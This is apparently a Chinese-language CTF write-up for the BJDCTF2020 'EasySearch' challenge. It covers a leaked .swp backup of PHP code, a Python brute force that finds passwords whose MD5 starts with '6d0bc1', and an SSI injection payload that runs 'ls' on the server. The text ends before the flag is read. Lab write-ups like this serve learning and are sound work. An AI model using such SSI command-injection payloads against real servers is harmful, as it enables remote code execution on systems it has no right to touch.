[BJDCTF2020]EasySearch

[BJDCTF2020]EasySearch

御剑扫一波

扫到一个index.php.swp

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";                                        //在public文件夹中，生成一个hash以后的文件，后缀为.shtml
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

看了一下代码以后，总而言之就是传上去的password需要以6d0bc1开头，python脚本直接上。

import hashlib
for i in range(10000000):
    if hashlib.md5(str(i).encode('utf-8')).hexdigest()[0:6] == '6d0bc1':
        print(i)
#2020666
#2305004
#9162671

跑出来三个，够了。

登录

用户名随意，密码选一个，然后登录并抓包，得到了一个url：

ssi注入漏洞

参考大佬博客

构造payload：

<!--#exec cmd="ls ../"-->

直接cat flag：